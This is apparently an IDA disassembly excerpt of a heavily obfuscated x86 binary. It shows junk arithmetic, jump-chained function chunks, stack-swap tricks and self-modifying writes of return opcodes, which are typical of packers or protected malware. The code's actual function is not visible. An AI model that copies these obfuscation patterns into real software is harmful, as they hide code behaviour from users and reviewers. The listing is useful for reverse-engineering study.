; FUNCTION CHUNK AT 00450000 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		call	sub_43E135
		push	3DF37660h
		pop	eax
		xor	eax, 0E8FEE59Dh
		or	eax, 4ED999EEh
		jmp	loc_44F46A
sub_441418	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_44143A:				; CODE XREF: sub_458DAF:loc_44B1CEj
		call	sub_445143
; END OF FUNCTION CHUNK	FOR sub_458DAF
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_44143F:				; CODE XREF: sub_44C1BD+B661j
		or	eax, 0D3AF6981h
		add	eax, 894B513h
		xchg	eax, [esp+4+var_4]
		jmp	sub_44128B
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_441453:				; CODE XREF: sub_44B8EF+103FAj
		jl	loc_4541AC
		or	eax, esi
		push	0E282B533h
		jno	loc_43DF05
		jmp	loc_446D24
; END OF FUNCTION CHUNK	FOR sub_44B8EF

; =============== S U B	R O U T	I N E =======================================



sub_44146B	proc near		; DATA XREF: k2vbe3.d:004486E8o
		neg	eax
		sbb	eax, eax
		push	offset sub_447ADA
		jmp	nullsub_527
sub_44146B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45890F

loc_441479:				; CODE XREF: sub_45890F:loc_442CF5j
		jz	loc_44A89F
; END OF FUNCTION CHUNK	FOR sub_45890F
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_44147F:				; CODE XREF: sub_44469A+88FBj
		jmp	loc_449149
; END OF FUNCTION CHUNK	FOR sub_44469A

; =============== S U B	R O U T	I N E =======================================



sub_441484	proc near		; CODE XREF: k2vbe3.d:004429BCj
					; k2vbe3.d:loc_455C02p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	sub_443916
sub_441484	endp

; ---------------------------------------------------------------------------
		adc	esi, edx
		ror	edi, 5
		jmp	sub_43CCDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552BE

loc_44149B:				; CODE XREF: sub_4552BE:loc_4462ACj
		and	ecx, 88C5F21Fh
		add	ecx, 0F7824293h
		xchg	ecx, [esp+0]
		jmp	loc_45476B
; END OF FUNCTION CHUNK	FOR sub_4552BE
; ---------------------------------------------------------------------------
		push	edx
		push	offset sub_44EF51
		jmp	loc_45630A
; ---------------------------------------------------------------------------

locret_4414BA:				; CODE XREF: k2vbe3.d:loc_44772Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_4414BB:				; CODE XREF: sub_44866A:loc_44121Ej
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_44086E
		call	sub_441109
		jnz	loc_44086E
		mov	eax, ebx
		jmp	loc_440870
; END OF FUNCTION CHUNK	FOR sub_44866A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_400. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4414DA	proc near		; CODE XREF: sub_446F26+9j
					; sub_4488D6+6E2j ...
		mov	eax, 32FD46C3h

locret_4414DF:				; CODE XREF: sub_454EDD:loc_454B23j
		retn
sub_4414DA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_4414E0:				; CODE XREF: sub_43FA2C+18D46j
		jmp	loc_45A80B
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D9B

loc_4414E5:				; CODE XREF: sub_448D9B+Cj
		jmp	loc_449095
; END OF FUNCTION CHUNK	FOR sub_448D9B
; ---------------------------------------------------------------------------

loc_4414EA:				; CODE XREF: k2vbe3.d:00459564j
		call	sub_443E64
; START	OF FUNCTION CHUNK FOR sub_44A56B

loc_4414EF:				; CODE XREF: sub_44A56B+9j
		jmp	loc_44C018
; END OF FUNCTION CHUNK	FOR sub_44A56B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_4414F4:				; CODE XREF: sub_44BDBB:loc_457ED7j
		sbb	eax, ebx
		jmp	loc_44F304
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------

locret_4414FB:				; CODE XREF: k2vbe3.d:loc_45173Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4414FC:				; CODE XREF: sub_45A323+C1j
		jmp	loc_455B59
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_441501:				; DATA XREF: sub_443F5B:loc_44131Co
		push	esi
		push	offset sub_459D58
		jmp	locret_4595DC
; ---------------------------------------------------------------------------
		mov	esi, ebp
		jmp	sub_44CF60
; ---------------------------------------------------------------------------

loc_441513:				; CODE XREF: k2vbe3.d:00455398j
		and	edi, 9759B636h
; START	OF FUNCTION CHUNK FOR sub_448052

loc_441519:				; CODE XREF: sub_448052+D32Ej
		sub	ebx, 0B498FF0Eh
		and	ebx, 0DC953AFDh
		add	ebx, 0F7B49FA3h
		jmp	loc_45664A
; END OF FUNCTION CHUNK	FOR sub_448052
; ---------------------------------------------------------------------------

loc_441530:				; CODE XREF: k2vbe3.d:00456FAFj
		cdq
		push	edi
		jmp	loc_446EB9
; ---------------------------------------------------------------------------

loc_441537:				; CODE XREF: k2vbe3.d:00451204j
		push	0D4320A7Eh
		pop	eax
		rol	eax, 1Bh
		jb	loc_458C59

loc_441546:				; CODE XREF: k2vbe3.d:0043D19Dj
		jmp	loc_4557CB
; ---------------------------------------------------------------------------
		db 0C1h
		dd 0F9D04EEh, 3F7F8Ah, 76F9E900h
		db 1, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_44155A:				; CODE XREF: sub_4486D7:loc_440ECDj
		jnz	loc_45AB9A
		jmp	loc_44CE24
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
		add	ebp, eax
		jmp	sub_4543B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_44156C:				; CODE XREF: sub_442C22:loc_43D4DAj
		jnz	loc_458D03
; END OF FUNCTION CHUNK	FOR sub_442C22
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_441572:				; CODE XREF: sub_44A6BD-DC21j
					; sub_44863D:loc_44FBEEj
		jmp	loc_447481
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
		popf
		jmp	loc_458CFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEF8

loc_44157D:				; CODE XREF: sub_43FEF8+8j
					; k2vbe3.d:00457CCEj
		jz	loc_453900
		jmp	loc_44A029
; END OF FUNCTION CHUNK	FOR sub_43FEF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BE9

loc_441588:				; CODE XREF: sub_447BE9-40A3j
		call	sub_44DF16

loc_44158D:				; CODE XREF: k2vbe3.d:0045593Dj
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_447BE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_441592:				; CODE XREF: sub_446E24+2A01j
		jmp	loc_448B7A
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_441597:				; CODE XREF: k2vbe3.d:loc_43CB01j
		xchg	edi, [esp]
		jmp	loc_448F30
; ---------------------------------------------------------------------------
		push	offset byte_456296
		jmp	loc_44AE91
; ---------------------------------------------------------------------------
		or	eax, edx
		jmp	loc_445250
; ---------------------------------------------------------------------------

loc_4415B0:				; DATA XREF: sub_441409+193C0o
		xchg	ebx, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_4415B8:				; CODE XREF: sub_44921C:loc_44284Bj
		xor	eax, 6E2B8915h
		jnz	loc_448C77

loc_4415C4:				; CODE XREF: k2vbe3.d:0045A4A1j
		jmp	loc_44E81C
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
		xchg	edi, esi
		jmp	loc_448C6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45725F

loc_4415D0:				; CODE XREF: sub_45725F+7j
		push	edx
		call	sub_43E135
		mov	eax, 0D4280129h
		call	sub_451759
		jmp	loc_452D15
; END OF FUNCTION CHUNK	FOR sub_45725F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_4415E5:				; CODE XREF: sub_4575BD-DE75j
		add	eax, ebp
		push	ebx
		push	0B133F38Fh
		pop	ebx
		and	ebx, 332FB995h
		add	ebx, 69E20063h
		jnb	loc_44BEE6
; END OF FUNCTION CHUNK	FOR sub_4575BD
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_441600:				; CODE XREF: sub_43F2E0+15A97j
		jmp	loc_43F9B5
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------
		test	edx, esi
		jmp	loc_449CBF
; ---------------------------------------------------------------------------
		push	0F707F5B3h
		jmp	sub_43C248
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_441616:				; CODE XREF: sub_459DA3-2C0Cj
		jz	loc_4515C3
		jmp	loc_43C357
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_441621:				; CODE XREF: sub_44471B:loc_45BC93j
		jl	loc_45380A
		test	ecx, 28F0501Fh
		jmp	loc_44D143
; END OF FUNCTION CHUNK	FOR sub_44471B

; =============== S U B	R O U T	I N E =======================================



sub_441632	proc near		; CODE XREF: sub_446523+3p
					; k2vbe3.d:0045623Cj

; FUNCTION CHUNK AT 00449612 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CDEA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044DBDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F3BC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004594F4 SIZE 0000001E BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, offset dword_4411BC
		call	sub_445024
		cmp	ds:dword_4411CC, 0
		jnz	loc_459508
		lea	edx, [ebp-14h]
		jmp	loc_449612
sub_441632	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C49B

loc_441655:				; CODE XREF: sub_44C49B+952Cj
		pop	ebx
		xor	ebx, 1D11D4Ch
		and	ebx, 0FA433F8Ch
		add	ebx, 0A843B235h
		xchg	ebx, [esp-8+arg_4]
		jmp	sub_442D04
; END OF FUNCTION CHUNK	FOR sub_44C49B
; ---------------------------------------------------------------------------

loc_441670:				; CODE XREF: k2vbe3.d:loc_453826j
		jl	loc_44975F

loc_441676:				; CODE XREF: k2vbe3.d:0045A24Dj
		jmp	loc_443D4E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BDE4

loc_44167B:				; CODE XREF: sub_45BDE4-16817j
		jmp	loc_449341
; END OF FUNCTION CHUNK	FOR sub_45BDE4
; ---------------------------------------------------------------------------
		add	edx, 2EF05542h
		jmp	loc_441B85
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44168B:				; CODE XREF: sub_445124+13860j
		push	3145000Fh
		pop	eax
		xor	eax, 923A7CD9h
		add	eax, 750E7FC8h
		or	eax, 0B6820E4Ch
		add	eax, 41700126h
		xchg	eax, [esp+0]
		jmp	loc_43F60F
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_4416B1:				; CODE XREF: sub_443BDF+9j
		jz	loc_441F93
		jmp	loc_452684
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_4416BC:				; CODE XREF: sub_45482D-734Ej
		add	eax, 6408594h
		add	eax, ebp
		add	eax, 712F5A4Ch
		mov	eax, [eax]
		push	esi
		pushf
		push	14AE7C3Ch
		jmp	loc_440018
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_450CE0
		jmp	loc_4440A0
; ---------------------------------------------------------------------------

loc_4416E5:				; CODE XREF: k2vbe3.d:0044C39Aj
		call	sub_444615
		mov	eax, 0A7A44D83h
		call	sub_4553CC
		mov	ds:dword_41E130, eax
		call	sub_43DE49
		ror	ebx, 0Fh
		jmp	loc_450588
; ---------------------------------------------------------------------------

loc_441707:				; DATA XREF: sub_4427BFo
		xchg	ecx, [esp]

loc_44170A:				; CODE XREF: k2vbe3.d:004495D9j
		mov	edx, ecx
		pop	ecx
		jnb	loc_452D29
		call	sub_45725F

loc_441718:				; CODE XREF: k2vbe3.d:004512B3j
		jmp	loc_43DCF4
; ---------------------------------------------------------------------------

loc_44171D:				; CODE XREF: k2vbe3.d:loc_44EA56j
		jz	loc_4468F3
		jmp	loc_446186
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_441728:				; CODE XREF: sub_448B5E-71D7j
		jge	loc_43D3BA

loc_44172E:				; CODE XREF: k2vbe3.d:004550E2j
		jmp	nullsub_316
; END OF FUNCTION CHUNK	FOR sub_448B5E
; ---------------------------------------------------------------------------
		xor	eax, 1FF1F144h
		jns	loc_457C95
		shr	edi, 4
		jmp	loc_43D3BA
; ---------------------------------------------------------------------------
		db 18h
dword_441748	dd 0B0513BEEh		; DATA XREF: sub_444B3E-26EDr
					; sub_456AC2+7w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_44174C:				; CODE XREF: sub_44DAF6+D100j
		jmp	loc_44AF23
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------
		db 65h,	0D6h, 99h
dword_441754	dd 0C3BEEB02h		; DATA XREF: sub_4461D5+5DC5r
					; k2vbe3.d:0045698Bw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_441758:				; CODE XREF: sub_44B979+723Bj
		jmp	loc_4447AA
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_44175D:				; CODE XREF: sub_44B8EF-4BB9j
		jmp	loc_4592A6
; END OF FUNCTION CHUNK	FOR sub_44B8EF
; ---------------------------------------------------------------------------
		dw 0C459h
dword_441764	dd 8061DF75h		; DATA XREF: k2vbe3.d:loc_4487FCw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_441768:				; CODE XREF: sub_44A6BD+102A6j
		jmp	loc_43E0D2
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
		db 6Ch,	0A0h, 76h
dword_441770	dd 0			; DATA XREF: sub_44A641-B0C7o
					; k2vbe3.d:00454919o ...
dword_441774	dd 153940h		; DATA XREF: k2vbe3.d:0043D89Br
					; k2vbe3.d:004488CEr ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_441778:				; CODE XREF: sub_43FA2C+F7D8j
		jmp	loc_440907
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------

loc_44177D:				; CODE XREF: k2vbe3.d:0044C636j
		jmp	loc_443D26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_441782:				; CODE XREF: sub_450F71-AD64j
		jmp	loc_455D6E
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		db 14h
off_441788	dd offset off_41E000	; DATA XREF: sub_44D0D5:loc_4419E8o
		dd 13h,	50h, 5Bh, 170h,	1, 8, 5, 18h, 1, 8, 9, 28h, 3
		dd 10h,	19h, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_4417D0:				; CODE XREF: sub_45762D+3B30j
		jmp	loc_45212C
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------

loc_4417D5:				; CODE XREF: k2vbe3.d:0044F598j
		jmp	loc_45A4F7
; ---------------------------------------------------------------------------
		and	ebx, esi
		pop	edx
		jmp	sub_43CC75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_4417E2:				; CODE XREF: sub_44B979+D7BCj
		or	edx, 736E2750h
		add	ebp, ebx

loc_4417EA:				; CODE XREF: k2vbe3.d:loc_44D674j
		add	eax, edx
		xor	eax, ebx
		add	eax, ecx

loc_4417F0:				; CODE XREF: k2vbe3.d:00449157j
		jmp	loc_44C935
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_4417F5:				; CODE XREF: sub_451759+8874j
		xor	eax, edi
		jmp	loc_4409EA
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
		mov	eax, 0F38AA262h
		call	sub_4553CC
		mov	ds:off_41E150, eax

loc_44180C:				; CODE XREF: k2vbe3.d:00441CBEj
		push	offset sub_455D20
		jmp	loc_447D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_441816:				; CODE XREF: sub_440D7B+11423j
		add	eax, 0CA16D9F7h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_459D8A
		jmp	loc_4569F4
; END OF FUNCTION CHUNK	FOR sub_440D7B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_308. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_44182C:				; CODE XREF: sub_4437D3+16383j
		jmp	loc_456192
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514E2

loc_441831:				; CODE XREF: sub_4514E2+6788j
		jmp	locret_4592A5
; END OF FUNCTION CHUNK	FOR sub_4514E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_441836:				; CODE XREF: sub_452092-A045j
		mov	[esi], edi
		test	edx, 52BE0D85h
		jmp	loc_457E59
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_441843:				; CODE XREF: sub_455BEA-64F2j
		or	eax, eax
		jnz	loc_446437
		jmp	loc_45B162
; END OF FUNCTION CHUNK	FOR sub_455BEA

; =============== S U B	R O U T	I N E =======================================



sub_441850	proc near		; CODE XREF: k2vbe3.d:0044B731j
					; sub_441850+135CFp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00441862 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045188B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454E00 SIZE 00000024 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		lea	eax, loc_45188B
		mov	byte ptr [eax],	0C3h
		jmp	loc_45188B
sub_441850	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441850

loc_441862:				; CODE XREF: sub_441850:loc_45188Bj
		call	sub_444E90

loc_441867:				; DATA XREF: sub_4529E2-399Co
		lea	eax, sub_4583B8
		mov	byte ptr [eax],	0C3h
		jmp	sub_4583B8
; END OF FUNCTION CHUNK	FOR sub_441850
; ---------------------------------------------------------------------------

loc_441875:				; CODE XREF: k2vbe3.d:loc_444CCCj
		mov	eax, [esp]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		jmp	loc_43CBE3
; ---------------------------------------------------------------------------

loc_441883:				; CODE XREF: k2vbe3.d:0044EDC7j
		add	ebp, esi

; =============== S U B	R O U T	I N E =======================================



sub_441885	proc near		; CODE XREF: sub_459FFC-B4D2p

; FUNCTION CHUNK AT 0043D577 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440429 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004409DF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004433CD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004479C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449F4C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A34B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A758 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044BE0F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456DF6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B9AC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045BCDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C225 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jmp	loc_4479C5
sub_441885	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_441898:				; DATA XREF: sub_4529E2-2556o
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44503F
		jmp	loc_454AB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_4418A6:				; CODE XREF: sub_443F0D:loc_4554FBj
		jz	loc_4447C1
		mov	ebx, edi
		pushf
		jmp	loc_4447C1
; END OF FUNCTION CHUNK	FOR sub_443F0D

; =============== S U B	R O U T	I N E =======================================



sub_4418B4	proc near		; CODE XREF: sub_4407B5:loc_4407C6p

; FUNCTION CHUNK AT 0044043D SIZE 00000005 BYTES

		push	offset sub_440863
		jmp	loc_44043D
sub_4418B4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44809D

loc_4418BE:				; CODE XREF: sub_44809D:loc_4549CFj
		xchg	edx, [esp+0]

loc_4418C1:				; CODE XREF: k2vbe3.d:loc_449024j
		mov	ecx, edx
		pop	edx
		rol	ecx, 1Fh
		add	ecx, 0E7636978h
		rol	ecx, 0Ah
		sub	ecx, 5B380901h
		add	ecx, 7206A083h
		jmp	loc_448312
; END OF FUNCTION CHUNK	FOR sub_44809D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_4418E1:				; CODE XREF: sub_43FF59:loc_4550A5j
		push	eax
		call	sub_45597D
		test	eax, eax
		jz	loc_44C423
		jmp	loc_4530A7
; END OF FUNCTION CHUNK	FOR sub_43FF59
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E204

loc_4418F5:				; CODE XREF: sub_43E204+5j
		push	ecx
		mov	ecx, [esp+4+arg_8]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_443D4E
		jmp	loc_43C3C4
; END OF FUNCTION CHUNK	FOR sub_43E204
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_501. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_44190C:				; CODE XREF: sub_452CF7+22DCj
		jmp	loc_43E715
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_441911:				; CODE XREF: sub_448A7D+A5BDj
		jmp	loc_44F3DC
; END OF FUNCTION CHUNK	FOR sub_448A7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_441916:				; CODE XREF: sub_454E69-A5E6j
		jmp	loc_45409A
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44191B:				; CODE XREF: sub_44B912+3510j
		jl	loc_44618E

loc_441921:				; CODE XREF: sub_45A323-7EDEj
		jmp	loc_43EB2F
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456471

loc_441926:				; CODE XREF: sub_456471-A304j
		jmp	loc_452152
; END OF FUNCTION CHUNK	FOR sub_456471
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_44F0BE
; ---------------------------------------------------------------------------

loc_441931:				; DATA XREF: sub_44D0D5:loc_44C27Co
		jb	loc_448F3C
		cmp	dword ptr [ebp-4], 1
		jnz	loc_448DEF
		jmp	loc_4477A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_441946:				; CODE XREF: sub_44CA34-CC2Fj
		jnz	loc_449366
		pop	ebp
		not	edx
		jmp	loc_45AF33
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------
		rol	ebp, 12h
		jmp	loc_4465AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C0CD

loc_44195C:				; CODE XREF: k2vbe3.d:00440FBEj
					; sub_45C0CD+Dj
		mov	eax, ds:dword_442828
		mov	[ebp+var_4], eax
		push	0C307FE15h
		xchg	ecx, [esp+18h+var_18]
		mov	eax, ecx

loc_44196E:				; CODE XREF: k2vbe3.d:loc_456843j
		jmp	loc_442A5D
; END OF FUNCTION CHUNK	FOR sub_45C0CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_441973:				; CODE XREF: sub_448B5E+61C8j
		adc	ebp, edi
		js	loc_44AA33

loc_44197B:				; CODE XREF: sub_448B5E:loc_44ED1Cj
		xor	ecx, 65741555h
		cmp	ecx, 930180C0h
		jmp	loc_441728
; END OF FUNCTION CHUNK	FOR sub_448B5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_44198C:				; CODE XREF: sub_45AD42-1D891j
		jz	loc_45207E

loc_441992:				; CODE XREF: k2vbe3.d:004537BDj
		jmp	loc_43D62D
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------

loc_441997:				; CODE XREF: k2vbe3.d:0043E336j
		jmp	loc_44EE00
; ---------------------------------------------------------------------------
		test	edi, ebp
		jmp	loc_448ECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4419A3:				; CODE XREF: sub_4424CF+A5DDj
		jg	loc_4496C3
		xchg	edx, [ebp+0]
		shr	esi, 8
		not	esi
		jmp	loc_4479AC
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
		xchg	edi, [esi]

loc_4419B8:				; CODE XREF: k2vbe3.d:loc_4495D3j
		test	ebp, 90B3743Ch
		jmp	loc_440B49
; ---------------------------------------------------------------------------

loc_4419C3:				; CODE XREF: k2vbe3.d:loc_4490E1j
		jge	loc_44B7C8
		push	ebx
		jmp	loc_44B7C0
; ---------------------------------------------------------------------------

loc_4419CF:				; DATA XREF: sub_43FE0A:loc_45C258o
		mov	eax, [ebp-0Ch]
		movzx	eax, byte ptr [eax]
		add	[ebp-8], eax
		push	offset loc_441DE1
		jmp	loc_43CBDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_4419E2:				; CODE XREF: sub_44D0D5-A08Dj
		jl	loc_452580

loc_4419E8:				; CODE XREF: sub_44D0D5:loc_443644j
		mov	eax, offset off_441788
		mov	[ebp-4], eax
		call	sub_45971A

loc_4419F5:				; DATA XREF: sub_459DA3:loc_457AE6o
		rol	eax, 3
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0]
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_441A04:				; CODE XREF: sub_4582DD-BFEj
		jmp	loc_447A6B
; END OF FUNCTION CHUNK	FOR sub_4582DD

; =============== S U B	R O U T	I N E =======================================



sub_441A09	proc near		; DATA XREF: sub_443F0D+91EBo

var_14		= dword	ptr -14h
var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043CBD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BE55 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456150 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045771F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045AECA SIZE 00000005 BYTES

		push	ebp
		jmp	loc_45771F
sub_441A09	endp

; ---------------------------------------------------------------------------
		sub	esi, ecx
		cmp	edx, 1BEF51BAh
		jmp	loc_44E515
; ---------------------------------------------------------------------------

loc_441A1C:				; DATA XREF: sub_458B3C+5o
		mov	eax, edx
		call	sub_442D04
		mov	eax, [esp]
		push	ecx
		push	0D0418BBDh
		pop	ecx
		sub	ecx, 42C5AE36h
		jmp	loc_44F149
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_355. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_441A39:				; CODE XREF: k2vbe3.d:00453A7Bj
		jmp	loc_45390D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jmp	loc_451828
; ---------------------------------------------------------------------------

loc_441A44:				; DATA XREF: sub_4575DF-11646o
		mov	[edx], eax
